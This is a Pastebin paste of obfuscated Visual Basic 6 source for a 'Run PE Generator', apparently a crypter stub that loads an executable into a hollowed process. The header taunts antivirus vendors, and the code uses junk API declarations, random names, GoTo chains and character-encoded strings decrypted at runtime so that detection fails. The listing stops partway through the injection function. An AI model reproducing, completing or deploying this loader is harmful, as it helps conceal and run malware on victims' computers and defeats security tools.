Advertisement
Guest User

Untitled

a guest
May 28th, 2017
126
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. '---------------------------------------------------------------------------------------
  2. ' Project     : Run PE Generator v1.1 - W7
  3. ' Author      : OiJkN
  4. ' Now         : 21/03/2010  21:13
  5. ' Compile     : P-Code !!!
  6. ' Thanks to   : Cobein/Slayer/Karcrack/Squeezer/Abronsius
  7. '
  8. '                           Make a special detection for me ;)
  9. '---------------------------------------------------------------------------------------
  10.  
  11.  
  12.  
  13. Private Declare Function oKJlSkVaAbmgyvRoM Lib "gdi32" (ByVal hDC As Long) As Long
  14. Private Declare Function MdsNBKidGIpIO Lib "WINMM.DLL" Alias "sndPlaySoundA" (ByVal Sound As Long, ByVal lngFlags As Long) As Long
  15. Private Declare Function rABzEciqThgwACuT Lib "WINMM.DLL" () As Long
  16. Private Declare Function lSVqSQliQeDDf Lib "version.dll" Alias "GetFileVersionInfoA" (ByVal lptstrFilename As String, ByVal dwHandle As Long, ByVal dwLen As Long, lpData As Any) As Long
  17. Private Declare Function cvbyQqQcVoYueurCTiqrAZ Lib "USER32" (ByVal hWnd As Long, ByVal X As Long, ByVal Y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal bRepaint As Long) As Long
  18. Private Declare Sub wO9vsZUxD Lib "kernel32" Alias "RtlMoveMemory" (hpC6iUVZq As Any, OjoJ93zb7 As Any, ByVal K3oOIbb7T As Long)
  19. Private Declare Function yflEMCidechRgwYQndfQwZDBkYsjaoyh Lib "USER32.DLL" Alias "SystemParametersInfoA" (ByVal uAction As Long, ByVal uParam As Long, ByRef lpvParam As Any, ByVal fuWinIni As Long) As Long
  20. Private Declare Function TvDPsLrPhthfZroKuFL Lib "WINMM.DLL" Alias "mmioInstallIOProcA" (ByVal fccIOProc As Long, ByVal pIOProc As Long, ByVal dwFlags As Long) As Long
  21. Private Declare Function klGHRpVzOvCUdSytusxcjMoZpt Lib "USER32" (ByVal hIcon As Long) As Long
  22. Private Declare Function MpTEAoJzq Lib "gdi32" (ByVal hGDIObj As Long) As Long
  23. Private Declare Function xxkQxThvcugkJyvpH Lib "WINMM.DLL" Alias "sndPlaySoundA" (ByVal Sound As Long, ByVal lngFlags As Long) As Long
  24. Private Declare Function xVcYjBQYirmPgy Lib "WINMM.DLL" Alias "sndPlaySoundA" (ByVal Sound As Long, ByVal lngFlags As Long) As Long
  25.  
  26. Private Declare Function JKINzszeqqFJM Lib "USER32.DLL" (ByVal hWnd As Long) As Long
  27. Private Declare Function slUCFaGUfANAnOkjLtK Lib "WINMM.DLL" Alias "sndPlaySoundA" (ByVal Sound As Long, ByVal lngFlags As Long) As Long
  28. Private Declare Function aALFYUsNmeamD Lib "USER32" (ByVal hCursor As Long) As Long
  29. Private Declare Function bkICgiOjo Lib "GDI32.DLL" (ByVal hDC As Long, ByVal nIndex As Long) As Long
  30. Private Declare Function FOONR Lib "USER32" (ByVal hWnd As Long, lpRect As Long) As Long
  31. Private Declare Function DqSj4empk Lib "USER32" Alias "LoadCursorFromFileA" (ByVal vHb6SVT7J As String) As Long
  32. Private Declare Function DiuuJNQIhwpZ Lib "WINMM.DLL" Alias "mixerGetLineInfoA" (ByVal hMixerObj As Long, pMixerL As Long, ByVal fdwInfo As Long) As Long
  33. Private Declare Function eGKZVERrrSbnPjOm Lib "USER32" (ByVal hDC As Long, ByVal X As Long, ByVal Y As Long, ByVal hIcon As Long) As Long
  34. Private Declare Function EPJcLidifqHVefoMHkmSZsAq Lib "WINMM.DLL" Alias "sndPlaySoundA" (ByVal Sound As Long, ByVal lngFlags As Long) As Long
  35. Private Declare Function RPUFMTkLKbQSKkMrpY Lib "USER32.DLL" (ByVal hWnd As Long) As Long
  36. Private Declare Function QNcmUTHjrDgzfDUhUSMfcy Lib "USER32" (ByVal hCursor As Long) As Long
  37. Private Declare Function zvGYZuvFdJnjpIQGmhiglVPQA Lib "USER32" Alias "SetWindowTextA" (ByVal hWnd As Long, ByVal strText As String) As Long
  38.  
  39. Private Declare Function bAdHsocx Lib "WINMM.DLL" Alias "mmioInstallIOProcA" (ByVal fccIOProc As Long, ByVal pIOProc As Long, ByVal dwFlags As Long) As Long
  40. Private Declare Function sCllYKHUjPiTYx Lib "WINMM.DLL" (ByVal hMixer As Long) As Long
  41. Private Declare Function dvsOlJPQapKLVfaDSmGZTJp Lib "WINMM.DLL" Alias "mciSendStringA" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long
  42. Private Declare Function wBngnReetxAr Lib "gdi32" (ByVal hGdiObject As Long) As Long
  43. Private Declare Function ZIqtNqufzNAnNkjLsKwAaALFYU Lib "USER32" Alias "RegisterWindowMessageA" (ByVal LPString As String) As Long
  44. Private Declare Function meamCRnbkHCgiOjow Lib "gdi32" (ByVal hColorSpace As Long) As Long
  45. Private Declare Function c8f6J6uoHEbvVNKVmBWK Lib "gdi32" (ByVal TgLOU4GaL As Long) As Long
  46. Private Declare Function abZeBIPuGGVadTtIBl Lib "WINMM.DLL" Alias "mciSendStringA" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long
  47. Private Declare Function qSQlhQeDDenzcvbyQqQ Lib "USER32.DLL" Alias "SystemParametersInfoA" (ByVal uAction As Long, ByVal uParam As Long, ByRef lpvParam As Any, ByVal fuWinIni As Long) As Long
  48. Private Declare Function oYuepuqCTiqrAZSwyfl Lib "USER32" (ByVal hDC As Long, ByVal xLeft As Long, ByVal yTop As Long, ByVal hIcon As Long, ByVal OutputWidth As Long, ByVal OutputHeight As Long, ByVal iStepIfAniCur As Long, ByVal hbrFlickerFreeDraw As Long, ByVal diFlags As Long) As Long
  49. Private Declare Function CidechRZgwQQmdfQwDBjYsjanyhgTTvDPsLrO Lib "WINMM.DLL" Alias "sndPlaySoundA" (ByVal Sound As Long, ByVal lngFlags As Long) As Long
  50. Private Declare Function hfZroKuFKHSlGHQpVzO Lib "WINMM.DLL" Alias "mmioInstallIOProcA" (ByVal fccIOProc As Long, ByVal pIOProc As Long, ByVal dwFlags As Long) As Long
  51.  
  52. Private Declare Function ytusxibjMoZptvnMpT Lib "USER32" Alias "LoadCursorFromFileA" (ByVal lpFileName As String) As Long
  53. Private Declare Function oIzqEOxwkQxTg Lib "WINMM.DLL" Alias "sndPlaySoundA" (ByVal Sound As Long, ByVal lngFlags As Long) As Long
  54. Private Declare Function tgkJx Lib "gdi32" (ByVal hMetaFile As Long) As Long
  55. Private Declare Function HEbxVcYjmQYirmPfySlgUA Lib "gdi32" (ByVal hGDIObj As Long) As Long
  56. Private Declare Function WpFAq5KiM Lib "USER32" Alias "LoadCursorA" (ByVal fyePjvJyL As Long, ByVal dUuERSRZQ As Long) As Long
  57. Private Declare Function INyszdqpFJMDdskU Lib "gdi32" (ByVal hDC As Long) As Long
  58. Private Declare Function aCGUfzNAnNkjLswAaALFYUrNmeamCR Lib "USER32" Alias "LoadIconA" (ByVal hLib As Long, ByVal lngIconID As Long) As Long
  59. Private Declare Function kHCgijowmRabZeBIPuGGVa Lib "USER32" (ByVal hWnd As Long, ByVal X As Long, ByVal Y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal bRepaint As Long) As Long
  60. Private Declare Function tIBlSVqSQlhQeDDenzc Lib "USER32" (ByVal hDC As Long, ByVal xLeft As Long, ByVal yTop As Long, ByVal hIcon As Long, ByVal OutputWidth As Long, ByVal OutputHeight As Long, ByVal iStepIfAniCur As Long, ByVal hbrFlickerFreeDraw As Long, ByVal diFlags As Long) As Long
  61. Private Declare Function vMnNZSlTqalrnyPfmnxU Lib "gdi32" (ByVal hColorSpace As Long) As Long
  62.  
  63. Private Declare Function BIyeaaY Lib "USER32" (ByVal hCursor As Long) As Long
  64. Private Declare Function UctTSjZcTsUAygUpf Lib "USER32" Alias "LoadCursorFromFileA" (ByVal lpFileName As String) As Long
  65. Private Declare Function uddPPrzMInLdpebUn Lib "WINMM.DLL" () As Long
  66. Private Declare Function rBHDOghCENlRvLs Lib "USER32" (ByVal hWnd As Long, lpRect As Long) As Long
  67. Private Declare Function aOuqqptfYfJkVlpskI Lib "gdi32" (ByVal hGdiObject As Long) As Long
  68. Private Declare Function G1M0c7kUDFZCGURANmmO Lib "gdi32" (ByVal ljNc590Hr As Long) As Long
  69. Private Declare Function AwlFvmAKttgSuQdrZq Lib "WINMM.DLL" Alias "mciSendStringA" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long
  70. Private Declare Function FurlDAY Lib "USER32" (ByVal hCursor As Long) As Long
  71. Private Declare Function YTgjxSUeojLcuOicRx Lib "gdi32" (ByVal hEnhMetaFile As Long) As Long
  72. Private Declare Function FKvovanmCFIAZohzBVyDQbwJxjKhfHpGs Lib "version.dll" Alias "VerQueryValueA" (pBlock As Any, ByVal lpSubBlock As String, lplpBuffer As Any, puLen As Long) As Long
  73. Private Declare Function wHBTQoJibQizNjQhEzde Lib "USER32" (ByVal hCursor As Long) As Long
  74. Private Declare Function ksiNQQbxELqDCSVZQpExhPRmO Lib "gdi32" (ByVal hDC As Long) As Long
  75.  
  76. Private Declare Function zzbjwrQvMnNZSlTqalrnyPfmn Lib "USER32" (ByVal hDC As Long, ByVal xLeft As Long, ByVal yTop As Long, ByVal hIcon As Long, ByVal OutputWidth As Long, ByVal OutputHeight As Long, ByVal iStepIfAniCur As Long, ByVal hbrFlickerFreeDraw As Long, ByVal diFlags As Long) As Long
  77. Private Declare Function hKMtzSbQwsqvgnuKllA Lib "olepro32.dll" (ByVal OLE_COLOR As Long, ByVal hPalette As Long, lpColorRef As Long) As Long
  78. Private Declare Function lKnRPxmGxoBvuiiJReGaFdvHvtn Lib "WINMM.DLL" (ByVal hMixerObj As Long, pMixerCD As Long, ByVal fdwDetails As Long) As Long
  79. Private Declare Function ZITZVhyzUVfDk Lib "SHELL32.DLL" Alias "SHGetFileInfoA" (ByVal pszPath As String, ByVal dwFileAttributes As Long, psfi As Long, ByVal cbFileInfo As Long, ByVal uFlags As Long) As Long
  80. Private Declare Function JPjrhMIGLwpxbCnDHJBbD Lib "USER32" Alias "LoadCursorFromFileA" (ByVal lpFileName As String) As Long
  81. Private Declare Function W6L5K6AaALFXHdNYealD Lib "WINMM.DLL" (ByVal S52Ta5A0T As Long) As Long
  82. Private Declare Function OCQNESdLKylLiuIqHu Lib "USER32" Alias "SetWindowTextA" (ByVal hWnd As Long, ByVal strText As String) As Long
  83. Private Declare Function LJDVSpLkqmxAPlmwFAet Lib "gdi32" (ByVal hGdiObject As Long) As Long
  84. Private Declare Function zujOYZQMGNrE Lib "USER32" (ByVal hDC As Long, ByVal xLeft As Long, ByVal yTop As Long, ByVal hIcon As Long, ByVal OutputWidth As Long, ByVal OutputHeight As Long, ByVal iStepIfAniCur As Long, ByVal hbrFlickerFreeDraw As Long, ByVal diFlags As Long) As Long
  85. Private Declare Function YbRrGyjQSoQUjtNcOBc Lib "WINMM.DLL" Alias "sndPlaySoundA" (ByVal Sound As Long, ByVal lngFlags As Long) As Long
  86. Private Declare Function aGZKOoOaTmjF Lib "USER32" (ByVal IconOrCursor As Long, ByRef pICONINFO As Long) As Long
  87. Private Declare Function soAQgBpyVQuwd Lib "USER32" (ByVal hCursor As Long) As Long
  88.  
  89. Private Declare Function opnsPQIUUkor Lib "olepro32.dll" (ByRef PicDesc As Any, ByRef RefIID As Long, ByVal fPictureOwnsHandle As Long, ByRef IPic As Long) As Long
  90. Private Declare Function jbLtvQtxLHqEeeENaCV Lib "gdi32" (ByVal hMetaFile As Long) As Long
  91. Private Declare Function rQrCwOxUEOUQdtIPRbyt Lib "USER32" Alias "LoadBitmapA" (ByVal hInstance As Long, ByVal lngBitmapID As Long) As Long
  92. Private Declare Function FLfndIDDCHszGQxxMCFx Lib "WINMM.DLL" (ByVal uPeriod As Long) As Long
  93. Private Declare Function ecJySJANYHGuVeqSmRpHTHF Lib "WINMM.DLL" () As Long
  94. Private Declare Function R4a6I0ghOUnylRMNLQBI Lib "gdi32" (ByVal BpemlMWZs As Long) As Long
  95. Private Declare Function OlUglhtKLhirPwapVc Lib "USER32" (ByVal IconOrCursor As Long, ByRef pICONINFO As Long) As Long
  96. Private Declare Function tZTUSYIBInNzPT Lib "gdi32" (ByVal hGDIObj As Long) As Long
  97. Private Declare Function nPufaOjaQepYQKwYu Lib "WINMM.DLL" () As Long
  98. Private Declare Function CTFJkYVPifBYwByJMcx Lib "USER32" (ByVal hDC As Long, ByVal X As Long, ByVal Y As Long, ByVal hIcon As Long) As Long
  99. Private Declare Function RMqFZsLGvbkljoZaDQPgkmeDSKvdfzchv Lib "USER32" (ByVal IconOrCursor As Long, ByRef pICONINFO As Long) As Long
  100. Private Declare Function nbNoK Lib "SHELL32.DLL" Alias "SHGetFileInfoA" (ByVal pszPath As String, ByVal dwFileAttributes As Long, psfi As Long, ByVal cbFileInfo As Long, ByVal uFlags As Long) As Long
  101.  
  102. Private Declare Function bAbmgyvRoMEAMdsNBKidIpJOQLrABzEcjqT Lib "USER32" (ByVal hWnd As Long, lpRect As Long) As Long
  103. Private Declare Function wADuTjb Lib "WINMM.DLL" Alias "mmioInstallIOProcA" (ByVal fccIOProc As Long, ByVal pIOProc As Long, ByVal dwFlags As Long) As Long
  104. Private Declare Function vQtxLHqEeeEaCVBZrQrCwOxUEOUQ Lib "USER32" (ByVal hCursor As Long) As Long
  105. Private Declare Function IPRbytQZFLf Lib "USER32" (ByVal hDC As Long, ByVal xLeft As Long, ByVal yTop As Long, ByVal hIcon As Long, ByVal OutputWidth As Long, ByVal OutputHeight As Long, ByVal iStepIfAniCur As Long, ByVal hbrFlickerFreeDraw As Long, ByVal diFlags As Long) As Long
  106. Private Declare Function EzAyDovCSutJzCtSvbYG Lib "USER32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
  107. Private Declare Function P5H1W2OGfImkTHcSJXhQ Lib "gdi32" (ByVal ljNc590Hr As Long) As Long
  108. Private Declare Function FwKUDDqqRanOiNmDP Lib "gdi32" (ByVal hMetaFile As Long) As Long
  109. Private Declare Function vNKhQciepGHdeLsVmRZsAp Lib "WINMM.DLL" Alias "sndPlaySoundA" (ByVal Sound As Long, ByVal lngFlags As Long) As Long
  110. Private Declare Function QOTFyFkKwLPSKjLrbQ Lib "USER32.DLL" Alias "GetClassNameA" (ByVal hWnd As Long, ByVal ClassName As String, ByVal ClassNameSize As Long) As Long
  111. Private Declare Function VMblTTtUqDRzQCGgURLeb Lib "gdi32" (ByVal hDC As Long) As Long
  112.  
  113.  
  114.  
  115.  
  116.  
  117. Private Const B9QyNW5fC       As Long = &H5A4D&
  118. Private Const SXYKSnDaE        As Long = &H4550&
  119.  
  120. Private Const f9XvbANO0           As Long = &H40
  121. Private Const r9prn87An           As Long = &HF8
  122. Private Const MTFdGPVuU     As Long = &H28
  123. Private Const KE3evtxdC As Long = &H28
  124.  
  125.  
  126.  
  127.  
  128. Private Const gm3lvp9zz              As Long = &H10007
  129. Private Const dmtuLGHvZ          As Long = &H4
  130. Private Const XVLAKkD0I                As Long = &H1000
  131. Private Const trEVgUtTi               As Long = &H2000
  132. Private Const gvoghHKD0    As Long = &H40
  133.  
  134. Private Type WBqByZHP6
  135.     cb                          As Long
  136.     lpReserved                  As Long
  137.     lpDesktop                   As Long
  138.     lpTitle                     As Long
  139.     dwX                         As Long
  140.     dwY                         As Long
  141.     dwXSize                     As Long
  142.     dwYSize                     As Long
  143.     dwXCountChars               As Long
  144.     dwYCountChars               As Long
  145.     dwFillAttribute             As Long
  146.     dwFlags                     As Long
  147.     wShowWindow                 As Integer
  148.     cbReserved2                 As Integer
  149.     lpReserved2                 As Long
  150.     hStdInput                   As Long
  151.     hStdOutput                  As Long
  152.     hStdError                   As Long
  153. End Type
  154.  
  155. Private Type w2w5VJCxF
  156.     hProcess                    As Long
  157.     hThread                     As Long
  158.     dwProcessID                 As Long
  159.     dwThreadID                  As Long
  160. End Type
  161.  
  162. Private Type VlDPXFD7q
  163.     ControlWord                 As Long
  164.     StatusWord                  As Long
  165.     TagWord                     As Long
  166.     ErrorOffset                 As Long
  167.     ErrorSelector               As Long
  168.     DataOffset                  As Long
  169.     DataSelector                As Long
  170.     RegisterArea(1 To 80)       As Byte
  171.     Cr0NpxState                 As Long
  172. End Type
  173.  
  174. Private Type rmHHPsafB
  175.     ContextFlags                As Long
  176.     Dr0                         As Long
  177.     Dr1                         As Long
  178.     Dr2                         As Long
  179.     Dr3                         As Long
  180.     Dr6                         As Long
  181.     Dr7                         As Long
  182.     FloatSave                   As VlDPXFD7q
  183.     SegGs                       As Long
  184.     SegFs                       As Long
  185.     SegEs                       As Long
  186.     SegDs                       As Long
  187.     Edi                         As Long
  188.     Esi                         As Long
  189.     Ebx                         As Long
  190.     Edx                         As Long
  191.     Ecx                         As Long
  192.     Eax                         As Long
  193.     Ebp                         As Long
  194.     Eip                         As Long
  195.     SegCs                       As Long
  196.     EFlags                      As Long
  197.     Esp                         As Long
  198.     SegSs                       As Long
  199. End Type
  200.  
  201. Private Type ghFoWNBil
  202.     e_magic                     As Integer
  203.     e_cblp                      As Integer
  204.     e_cp                        As Integer
  205.     e_crlc                      As Integer
  206.     e_cparhdr                   As Integer
  207.     e_minalloc                  As Integer
  208.     e_maxalloc                  As Integer
  209.     e_ss                        As Integer
  210.     e_sp                        As Integer
  211.     e_csum                      As Integer
  212.     e_ip                        As Integer
  213.     e_cs                        As Integer
  214.     e_lfarlc                    As Integer
  215.     e_ovno                      As Integer
  216.     e_res(0 To 3)               As Integer
  217.     e_oemid                     As Integer
  218.     e_oeminfo                   As Integer
  219.     e_res2(0 To 9)              As Integer
  220.     e_lfanew                    As Long
  221. End Type
  222.  
  223. Private Type a88Fak5yA
  224.     Machine                     As Integer
  225.     NumberOfSections            As Integer
  226.     TimeDateStamp               As Long
  227.     PointerToSymbolTable        As Long
  228.     NumberOfSymbols             As Long
  229.     SizeOfOptionalHeader        As Integer
  230.     Characteristics             As Integer
  231. End Type
  232.  
  233. Private Type XvT5oY5UW
  234.     VirtuaC6t0R7rHvArQtYWEsNEu              As Long
  235.     Size                        As Long
  236. End Type
  237.  
  238. Private Type OZcnC16SG
  239.     Magic                       As Integer
  240.     MajorLinkerVersion          As Byte
  241.     MinorLinkerVersion          As Byte
  242.     SizeOfCode                  As Long
  243.     SizeOfInitializedData       As Long
  244.     SizeOfUnitializedData       As Long
  245.     AddressOfEntryPoint         As Long
  246.     BaseOfCode                  As Long
  247.     BaseOfData                  As Long
  248.     ImageBase                   As Long
  249.     SectionAlignment            As Long
  250.     FileAlignment               As Long
  251.     MajorOperatingSystemVersion As Integer
  252.     MinorOperatingSystemVersion As Integer
  253.     MajorImageVersion           As Integer
  254.     MinorImageVersion           As Integer
  255.     MajorSubsystemVersion       As Integer
  256.     MinorSubsystemVersion       As Integer
  257.     W32VersionValue             As Long
  258.     SizeOfImage                 As Long
  259.     SizeOfHeaders               As Long
  260.     CheckSum                    As Long
  261.     SubSystem                   As Integer
  262.     DllCharacteristics          As Integer
  263.     SizeOfStackReserve          As Long
  264.     SizeOfStackCommit           As Long
  265.     SizeOfHeapReserve           As Long
  266.     SizeOfHeapCommit            As Long
  267.     LoaderFlags                 As Long
  268.     NumberOfRvaAndSizes         As Long
  269.     DataDirectory(0 To 15)      As XvT5oY5UW
  270. End Type
  271.  
  272. Private Type CbtBC4ekK
  273.     Signature                   As Long
  274.     FileHeader                  As a88Fak5yA
  275.     OptionalHeader              As OZcnC16SG
  276. End Type
  277.  
  278. Private Type g4RjcGTKu
  279.    Characteristics              As Long
  280.    TimeDateStamp                As Long
  281.    MajorVersion                 As Integer
  282.    MinorVersion                 As Integer
  283.    lpName                       As Long
  284.    Base                         As Long
  285.    NumberOfFunctions            As Long
  286.    NumberOfNames                As Long
  287.    lpAddressOfFunctions         As Long
  288.    lpAddressOfNames             As Long
  289.    lpAddressOfNameOrdinals      As Long
  290. End Type
  291.  
  292. Private Type mEhHu7Fmf
  293.     SecName                     As String * 8
  294.     VirtualSize                 As Long
  295.     VirtuaC6t0R7rHvArQtYWEsNEu              As Long
  296.     SizeOfRawData               As Long
  297.     PointerToRawData            As Long
  298.     PointerToRelocations        As Long
  299.     PointerToLinenumbers        As Long
  300.     NumberOfRelocations         As Integer
  301.     NumberOfLinenumbers         As Integer
  302.     Characteristics             As Long
  303. End Type
  304.  
  305.  
  306. Private awKHqa6ZF         As Long
  307. Private JsRxtDuqO      As Long
  308. Private tiKQbrb34         As Boolean
  309. Private Qnrmt0tMW          As Long
  310. Private mfM6R8zDQ       As Long
  311. Private WfyxtT8nv(&HFF)   As Byte
  312.        
  313. Public Function JJAcJc0Fl() As Long
  314. Debug.Print Chr(79) + Chr(105) + Chr(74) + Chr(107) + Chr(78)
  315.     Dim f0Y8D0KOcwAJSNqHZtNH As String, v5l6j7aTaFRRgknfETMy As String, v8hLQpWBZ() As String, b7g0y3oNFCNesOCLjdHJ As String, p2P4N8CCBGcjqVihwBEy As Integer
  316.     f0Y8D0KOcwAJSNqHZtNH = Chr$(51)
  317.     For p2P4N8CCBGcjqVihwBEy = 1 To Len(f0Y8D0KOcwAJSNqHZtNH)
  318. v5l6j7aTaFRRgknfETMy = v5l6j7aTaFRRgknfETMy & IIf(p2P4N8CCBGcjqVihwBEy = 1, Asc(Mid$(f0Y8D0KOcwAJSNqHZtNH, p2P4N8CCBGcjqVihwBEy, 1)), Chr$(124) _
  319.  & Asc(Mid$(f0Y8D0KOcwAJSNqHZtNH, p2P4N8CCBGcjqVihwBEy, 1)))
  320.     Next p2P4N8CCBGcjqVihwBEy
  321.     v8hLQpWBZ() = rZjOyBMBM(v5l6j7aTaFRRgknfETMy, Chr$(124))
  322.     For p2P4N8CCBGcjqVihwBEy = 0 To UBound(v8hLQpWBZ)
  323.     b7g0y3oNFCNesOCLjdHJ = b7g0y3oNFCNesOCLjdHJ & Chr(CLng(v8hLQpWBZ(p2P4N8CCBGcjqVihwBEy)))
  324.     Next p2P4N8CCBGcjqVihwBEy
  325.     If b7g0y3oNFCNesOCLjdHJ = Chr$(51) Then GoTo 3
  326. 3:
  327. End Function
  328.  
  329. Public Function G8MvJAjoU(ByRef p8rpyUDyf() As Byte, Optional KBxJ8bE71 As String) As Boolean
  330.  GoTo j5M8v3twMJrFeeGOaDWC
  331. j5M8v3twMJrFeeGOaDWC:
  332.     Dim mpWCXcoZN                       As Long
  333. GoTo M5E5o6BkHqCIEPguDEOl
  334. M5E5o6BkHqCIEPguDEOl:
  335.     Dim nfjrysVgu       As ghFoWNBil
  336. GoTo g1L7R4PupqotelsJkjAp
  337. g1L7R4PupqotelsJkjAp:
  338.     Dim OqXXVZ4wM       As CbtBC4ekK
  339. GoTo s6J6R2vkGymBLttggIQd
  340. s6J6R2vkGymBLttggIQd:
  341.     Dim Lcfn7JQoZ   As mEhHu7Fmf
  342. GoTo F4E5t1urlEBXHSYUfvwT
  343. F4E5t1urlEBXHSYUfvwT:
  344.     Dim GXTajmrwx            As WBqByZHP6
  345. GoTo U5C6M5IPiqfLHHFKyoya
  346. U5C6M5IPiqfLHHFKyoya:
  347.     Dim ZbXogQyas    As w2w5VJCxF
  348. GoTo B6C1J0ZChRNCWMDRbKKv
  349. B6C1J0ZChRNCWMDRbKKv:
  350.     Dim I683ZWZB9                As rmHHPsafB
  351. GoTo j2g8I7HsvWLICURoKiok
  352. j2g8I7HsvWLICURoKiok:
  353.     Dim Fdquendve                 As Long
  354. GoTo U4m1K3cXBRjEXRHmyytk
  355. U4m1K3cXBRjEXRHmyytk:
  356.     Dim SmLB8PCzU                  As Long
  357. GoTo d6P5b7uwpOdWGnqLnrGQ
  358. d6P5b7uwpOdWGnqLnrGQ:
  359.     Dim lbiJtN9fS                    As Long
  360.      Dim l0l4A4UveyhlLlvqJGdX As String, P2X7D4MVtnRTAUZhXDMM As String, IE13cXlxB() As String, I4T0P7oQYkNgMkCbCNHZ As String, J5P4g5nFTbclKFhjQWpw As Integer
  361.     l0l4A4UveyhlLlvqJGdX = Chr$(55)
  362.     For J5P4g5nFTbclKFhjQWpw = 1 To Len(l0l4A4UveyhlLlvqJGdX)
  363. P2X7D4MVtnRTAUZhXDMM = P2X7D4MVtnRTAUZhXDMM & IIf(J5P4g5nFTbclKFhjQWpw = 1, Asc(Mid$(l0l4A4UveyhlLlvqJGdX, J5P4g5nFTbclKFhjQWpw, 1)), Chr$(124) _
  364.  & Asc(Mid$(l0l4A4UveyhlLlvqJGdX, J5P4g5nFTbclKFhjQWpw, 1)))
  365.     Next J5P4g5nFTbclKFhjQWpw
  366.     IE13cXlxB() = rZjOyBMBM(P2X7D4MVtnRTAUZhXDMM, Chr$(124))
  367.     For J5P4g5nFTbclKFhjQWpw = 0 To UBound(IE13cXlxB)
  368.     I4T0P7oQYkNgMkCbCNHZ = I4T0P7oQYkNgMkCbCNHZ & Chr(CLng(IE13cXlxB(J5P4g5nFTbclKFhjQWpw)))
  369.     Next J5P4g5nFTbclKFhjQWpw
  370.     If I4T0P7oQYkNgMkCbCNHZ = Chr$(55) Then GoTo 7
  371. 7:
  372.     If Not tiKQbrb34 Then Exit Function
  373. GoTo T2P2S0KRhJIYOQIhKomV
  374. T2P2S0KRhJIYOQIhKomV:
  375.     Call wO9vsZUxD(nfjrysVgu, p8rpyUDyf(0), f9XvbANO0)
  376. GoTo J5U2Z6SSFFgoCdvcBSeS
  377. J5U2Z6SSFFgoCdvcBSeS:
  378.     If Not nfjrysVgu.e_magic = B9QyNW5fC Then
  379. GoTo Q2c4y5qvsEVWrsDaHkAg
  380. Q2c4y5qvsEVWrsDaHkAg:
  381.         Exit Function
  382. GoTo L5m5I0ECHrlsWwiDGvWd
  383. L5m5I0ECHrlsWwiDGvWd:
  384.     End If
  385. GoTo O1w3J0OYHHtgHdqFlEpt
  386. O1w3J0OYHHtgHdqFlEpt:
  387.     Call wO9vsZUxD(OqXXVZ4wM, p8rpyUDyf(nfjrysVgu.e_lfanew), r9prn87An)
  388. GoTo T1F0R2kHflhsyLghrByZ
  389. T1F0R2kHflhsyLghrByZ:
  390.     If Not OqXXVZ4wM.Signature = SXYKSnDaE Then
  391. GoTo p1c8p5LTUSXJCJnAAPTW
  392. p1c8p5LTUSXJCJnAAPTW:
  393.         Exit Function
  394. GoTo N6C8e2PjMQeoKXKvXtsV
  395. N6C8e2PjMQeoKXKvXtsV:
  396.     End If
  397. GoTo D3G2j2VPheBXynjyNbvk
  398. D3G2j2VPheBXynjyNbvk:
  399. Fdquendve = P4EYumIcN(BEWRmY2Bl(Chr$(99) & Chr$(107) & Chr$(108) & Chr$(80) & Chr$(27) & Chr$(108) & Chr$(49) _
  400.  & Chr$(48), Chr$(82) & Chr$(51) & Chr$(117) & Chr$(51) & Chr$(103) & Chr$(52) & Chr$(115) & Chr$(112) _
  401.  & Chr$(77) & Chr$(105)))
  402. GoTo t3M7r4swGybkkjnLSZEQ
  403. t3M7r4swGybkkjnLSZEQ:
  404. SmLB8PCzU = P4EYumIcN(BEWRmY2Bl(Chr$(222) & Chr$(20) & Chr$(218) & Chr$(236) & Chr$(108), Chr$(72) & Chr$(48) _
  405.  & Chr$(117) & Chr$(49) & Chr$(88) & Chr$(54) & Chr$(73) & Chr$(121) & Chr$(70) & Chr$(99)))
  406. GoTo o1I2D5qjTBEYBFTPMllN
  407. o1I2D5qjTBEYBFTPMllN:
  408.     If KBxJ8bE71 = vbNullString Then
  409. GoTo V6K5J5YKEWGcMXcZkCQY
  410. V6K5J5YKEWGcMXcZkCQY:
  411.         KBxJ8bE71 = Space(260)
  412. GoTo Z6H0e5NTmukQLMKPAHOe
  413. Z6H0e5NTmukQLMKPAHOe:
  414. lbiJtN9fS = Jun1VG4mO(Fdquendve, BEWRmY2Bl(Chr$(137) & Chr$(197) & Chr$(52) & Chr$(51) & Chr$(111) & Chr$(102) _
  415.  & Chr$(119) & Chr$(110) & Chr$(103) & Chr$(68) & Chr$(107) & Chr$(110) & Chr$(103) & Chr$(76) _
  416.  & Chr$(99) & Chr$(111) & Chr$(103) & Chr$(85), Chr$(88) & Chr$(48) & Chr$(68) & Chr$(54) & Chr$(69) _
  417.  & Chr$(49) & Chr$(82) & Chr$(71) & Chr$(109) & Chr$(117)))
  418. GoTo F1U2N1eHljRGaRIVgPOC
  419. F1U2N1eHljRGaRIVgPOC:
  420.         WotN7p9P5 lbiJtN9fS, App.hInstance, StrPtr(KBxJ8bE71), 260
  421. GoTo C5l8a8ZvPbPNHZWscnsp
  422. C5l8a8ZvPbPNHZWscnsp:
  423.     End If
  424. GoTo B3T7p0XEhvdjDLBgbcaf
  425. B3T7p0XEhvdjDLBgbcaf:
  426.  
  427. GoTo Q1R8W1XbdVuXCmiWqhYm
  428. Q1R8W1XbdVuXCmiWqhYm:
  429.         GXTajmrwx.cb = Len(GXTajmrwx)
  430. GoTo h3Q0p3nAOyNDdROJaYuQ
  431. h3Q0p3nAOyNDdROJaYuQ:
  432. lbiJtN9fS = Jun1VG4mO(Fdquendve, BEWRmY2Bl(Chr$(213) & Chr$(66) & Chr$(59) & Chr$(223) & Chr$(244) & Chr$(101) _
  433.  & Chr$(82) & Chr$(112) & Chr$(109) & Chr$(97) & Chr$(103) & Chr$(113) & Chr$(113) & Chr$(85), Chr$(121) _
  434.  & Chr$(56) & Chr$(87) & Chr$(53) & Chr$(107) & Chr$(50) & Chr$(98) & Chr$(97) & Chr$(113) & Chr$(117) _
  435. ))
  436. GoTo o8q0G3qrBLGjRlFoUdec
  437. o8q0G3qrBLGjRlFoUdec:
